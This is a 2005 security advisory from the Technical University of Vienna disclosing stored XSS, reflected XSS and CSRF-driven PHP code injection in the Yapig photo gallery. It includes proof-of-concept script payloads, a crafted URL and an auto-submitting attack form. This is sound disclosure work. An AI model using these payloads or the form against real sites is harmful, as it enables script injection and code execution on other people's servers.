===========================================================
Yapig: XSS / Code Injection Vulnerability
===========================================================
Technical University of Vienna Security Advisory
TUVSA-0510-001, October 13, 2005
===========================================================


Affected applications
----------------------

Yapig (yapig.sourceforge.net)

Versions 0.95b and prior.


Description
------------


1.) Stored XSS

An attacker can include malicious JavaScript by posting an image-related comment and inserting something like the following into the "Homepage" form field:

"><script>alert('hi')</script>

This attack falls under the category of stored cross-site scripting and doesn't require the attacker to be logged in.


2.) Reflected XSS

An attacker can include malicious JavaScript by tricking a user into clicking a link to the following URL:

    http://your-server/path-to-yapig/view.php?gid=1&phid=1&img_size=><script>alert('hi')</script>

The fields "your-server" and "path-to-yapig" in the given URL have to be adjusted accordingly. The parameters "gid=1" and "phid=1" assume that there exist a gallery and a photo with ID 1 and can be adjusted as well.

Moreover, the width of the image being viewed has to be less than $MAX_IMG_SIZE (set inside config.php) because otherwise, the vulnerable variable $img_size is set to a safe value inside the if-branch on line 120 of view.php. And finally, register_globals has to be active.


3.) Code Injection

An attacker can inject arbitrary PHP code into a gallery's "guid_info.php" file by tricking the logged-in admin into clicking a link to a page with the following contents:

    <form method="post" action="http://your-server/path-to-yapig/yapig095b/modify_gallery.php?action=mod_info&amp;gid=1">
      <input value='TestGallery"; echo "evil' name="title" type="text">
      <input value="TestAuthor" name="author" type="text">
      <input value="TestDate" name="date" type="text"> 
      <input value="" name="dir" type="text">
      <input value="TestDescription" name="desc" type="text">
      <input type="submit">
    </form>

    <script type="text/javascript">
      document.forms[0].submit();
    </script>

As for vulnerability #2, "your-server", "path-to-yapig", "gid" and "phid" can be adjusted.

Apart from this, Yapig seems to be susceptible to "Cross-Site Request Forgery" (CSRF) attacks in general. However, this problem is not limited to Yapig, but affects a large number of comparable web applications available at this time.


Solution
---------

Attempts to contact the authors were not successful until now, so there is no official solution available yet.

Timeline:

September 28, 2005: Attempt to contact Yapig developers via "natasab at users.sourceforge.net".

October 5, 2005: Attempt to contact Yapig developers via Sourceforge bug tracker.

October 13, 2005: Advisory submission.


Nenad Jovanovic
Secure Systems Lab 
Technical University of Vienna 
www.seclab.tuwien.ac.at